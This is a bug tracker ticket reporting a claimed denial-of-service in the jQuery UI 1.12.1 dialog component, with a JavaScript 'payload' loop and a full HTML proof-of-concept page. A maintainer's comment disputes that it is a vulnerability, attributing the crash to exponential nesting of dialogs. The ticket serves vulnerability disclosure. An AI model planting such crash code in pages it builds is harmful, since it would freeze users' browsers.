Search and Top Navigation
#15390 new bug ()
Opened November 25, 2020 07:38PM UTC
Last modified January 29, 2021 09:34AM UTC
Denial of Service (DoS) - jQuery UI 1.12.1 - Dialog
| Reported by: | rafaelcintralopes | Owned by: | |
|---|---|---|---|
| Priority: | major | Milestone: | none |
| Component: | ui.dialog | Version: | 1.12.1 |
| Keywords: | Cc: | ||
| Blocked by: | Blocking: |
Description
When we inject the "dialog" for any HTML tag, more than once, the browser and the application crashes, closing the application.
**Payload:
**
for (var i = 0; i < 10; i++) {
$("div").dialog({title:'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'});
}
**PoC:
**
Create an HTML file with the following code or insert the Payload above in a vulnerable environment:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>DoS - jQuery UI 1.12.1</title>
</head>
<body>
<h2>DoS - jQuery UI 1.12.1</h2>
<div>
<button onclick="exploit()">Exploit</button>
</div>
<p>PoC by Rafael Cintra Lopes</p>
<script src="https://code.jquery.com/jquery-3.5.1.min.js" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
<script src="https://code.jquery.com/ui/1.12.1/jquery-ui.min.js" integrity="sha256-VazP97ZCwtekAsvgPBSUwPFKdrwD3unUfSGVYrahUqU=" crossorigin="anonymous"></script>
<script>
function exploit(){
for (var i = 0; i < 10; i++) {
$("div").dialog({title:'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'});
}
}
</script>
</body>
</html>
Attachments (0)
Change History (3)
Changed November 25, 2020 07:39PM UTC by comment:1
| priority: | minor → major |
|---|
Changed January 22, 2021 08:55AM UTC by comment:2
| _comment0: | Is work being done on this one? Cheers. → 1611315748879149 |
|---|
https://snyk.io/vuln/SNYK-JS-JQUERYUI-1052825
Is work being done on this one? Cheers.
Changed January 29, 2021 09:32AM UTC by comment:3
| _comment0: | Not a security vulnerability in my opinion (this issue was reported as CVE-2020-28488). You are just spawning dialogue boxes in dialogue boxes - dialogue boxes themselves are made of `div`s which leads to exponential growth of dialogue boxes. → 1611912832158751 |
|---|---|
| _comment1: | Not a security vulnerability in my opinion (this issue was reported as CVE-2020-28488). You are just spawning dialogue boxes in dialogue boxes - dialogue boxes themselves are made of `div`s which leads to exponential growth of dialogue boxes as you are spawning a dialogue box for each `div` in the document. → 1611912853881555 |
Not a security vulnerability in my opinion (this issue was reported as CVE-2020-28488) or even a bug for that matter. You are just spawning dialogue boxes in dialogue boxes - dialogue boxes themselves are made of divs which leads to exponential growth of dialogue boxes as you are spawning a dialogue box for each div in the document.